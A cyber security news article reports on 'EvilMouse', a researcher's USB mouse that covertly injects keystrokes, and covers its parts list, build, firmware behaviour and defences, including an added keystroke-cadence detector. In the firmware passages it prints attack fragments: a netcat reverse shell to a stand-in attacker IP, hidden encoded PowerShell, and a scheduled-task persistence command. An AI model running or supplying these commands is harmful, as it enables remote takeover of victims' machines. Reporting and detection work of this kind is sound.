Categories: Cyber Security News

$44 “Evilmouse” Can Autonomously Execute Commands and Compromise Systems

In a stark demonstration of low-cost hardware-based attacks, security researcher NEWO-J has unveiled “EvilMouse,” a fully functional USB mouse that doubles as a covert keystroke injector.

Priced at under $44 in parts, the device emulates a Human Interface Device (HID) to autonomously deliver payloads upon connection, bypassing traditional USB suspicion vectors like rogue thumb drives.

This build leverages the Raspberry Pi Pico RP2040 Zero microcontroller, underscoring vulnerabilities in endpoint detection amid rising physical access threats.

Building Evilmouse

EvilMouse draws inspiration from Hak5’s USB Rubber Ducky but disguises malice within innocuous peripherals.

Unlike a bare USB stick flagged by employee training, a mouse evokes zero suspicion, especially with preserved optical tracking and button functionality. Total bill of materials (BOM) breaks down as follows:

Component                          Quantity   Approx. Price
RP2040 Zero                        1          $3
Adafruit 2-Port USB Hub Breakout   1          $5
Amazon Basics Mouse                1          $6
USB-C Pigtail Cable                1          $3
Rosin-core 60/40 Solder            1          $8
USB-C Data Cable                   1          $8
Flux Paste                         1          $6
Kapton Tape                        1          $5
Dupont Wires                       4          ~$0.03
Total                                         ~$44

Construction demanded precision engineering within the donor mouse’s compact shell. Initial challenges included excising plastic ribbing with a multi-tool cutter and desoldering the stock PCB’s white USB connector with a flathead screwdriver.


The RP2040 Zero, flashed with CircuitPython firmware, handles HID emulation and payload execution.

Because existing pico-ducky scripts are written for the original Pico boards and are incompatible with the RP2040 Zero, the author wrote custom code that implements a Windows Defender-evading reverse shell to a listener host, delivered in seconds via emulated keystrokes that mimic user input.

Key firmware logic spoofs HID reports over USB 2.0, injecting DuckyScript-like sequences: opening PowerShell (powershell.exe -WindowStyle Hidden -enc), encoding base64 payloads for obfuscation, and establishing TCP connections (e.g., nc -e cmd.exe attacker_ip 4444).

Source code resides at GitHub: NEWO-J/evilmouse, with extensibility for DuckyScript compatibility, Rust-based keystroke acceleration, or persistence via scheduled tasks (schtasks /create /sc onlogon /tn EvilTask /tr "powershell -ep bypass -c Invoke-WebRequest...").

Demo footage reveals admin-level compromise: Plugging EvilMouse into “Victim PC A” yields a Netcat listener shell on “Attacker PC B” within 5 seconds, granting remote code execution (RCE) without EDR alerts.

Enhancements like hidden CMD windows (-WindowStyle Hidden) or WMI persistence amplify stealth.

Security implications are dire for air-gapped or high-security environments. While intended for education and red teaming, EvilMouse exposes gaps in HID trust models: USB hubs relay attached devices without scrutiny, and modern OSes (Windows 11, macOS Sonoma) auto-enumerate mice without any user prompt.

Defenses include USB device whitelisting via Group Policy (Device Installation Restrictions), endpoint behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring), and physical port controls like Kensington locks.
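As an added example (not code from the EvilMouse project), the kind of keystroke-cadence check that the behavioral-analytics defense above relies on: it splits key-down timestamps into typing bursts and flags any burst typed faster, or more evenly, than a human hand can manage. The thresholds and the sample telemetry are constructed assumptions for illustration.

```python
from itertools import accumulate
from statistics import mean, pstdev
from typing import List, Optional, Sequence, Tuple

# Added example, not EvilMouse project code. Thresholds are assumptions for
# illustration; tune them against real input telemetry before deployment.
BURST_GAP_S = 0.5          # a pause longer than this ends a typing burst
MIN_BURST_KEYS = 12        # ignore short bursts (a shortcut, a password)
MAX_HUMAN_RATE_KPS = 15.0  # ~180 wpm sustained; injectors type far faster
MAX_MACHINE_CV = 0.15      # inter-key jitter: scripted typing is metronomic

def split_bursts(timestamps: Sequence[float]) -> List[List[float]]:
    """Group sorted key-down timestamps (seconds) into bursts."""
    bursts: List[List[float]] = []
    for t in timestamps:
        if bursts and t - bursts[-1][-1] <= BURST_GAP_S:
            bursts[-1].append(t)
        else:
            bursts.append([t])
    return bursts

def burst_stats(burst: Sequence[float]) -> Optional[Tuple[float, float]]:
    """(keys per second, coefficient of variation of gaps), or None if short."""
    if len(burst) < MIN_BURST_KEYS:
        return None
    gaps = [b - a for a, b in zip(burst, burst[1:])]
    avg = max(mean(gaps), 1e-9)       # guard against identical timestamps
    return 1.0 / avg, pstdev(gaps) / avg

def is_injected(burst: Sequence[float]) -> bool:
    """Too fast or too regular for a human hand on a real keyboard."""
    stats = burst_stats(burst)
    if stats is None:
        return False
    rate, cv = stats
    return rate > MAX_HUMAN_RATE_KPS or cv < MAX_MACHINE_CV

def flagged_bursts(timestamps: Sequence[float]) -> List[Tuple[float, int]]:
    """(start time, key count) of every burst that looks machine-typed."""
    return [(b[0], len(b)) for b in split_bursts(timestamps) if is_injected(b)]

def constructed_sample() -> List[float]:
    """Constructed telemetry: a hand-typed sentence, a 3 s pause, then 40
    keystrokes 5 ms apart, the cadence of a hidden-PowerShell injection."""
    ts = list(accumulate([0.0, 0.11, 0.18, 0.09, 0.25, 0.14, 0.07, 0.21,
                          0.12, 0.30, 0.10, 0.16, 0.08, 0.19, 0.13, 0.22]))
    start = ts[-1] + 3.0
    return ts + [start + 0.005 * i for i in range(40)]
```

A slow but perfectly regular injector (one key every 100 ms) is still caught by the jitter test even though its rate looks human.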

NEWO-J urges improvements: remote activation via magic packets, advanced AMSI bypasses (e.g., reflective PE loading), or multi-stage payloads.

At $44 versus $100+ for commercial Duckies, this democratizes sophisticated attacks, compelling CISOs to rethink peripheral supply chains.


The post $44 “Evilmouse” Can Autonomously Execute Commands and Compromise Systems appeared first on Cyber Security News.
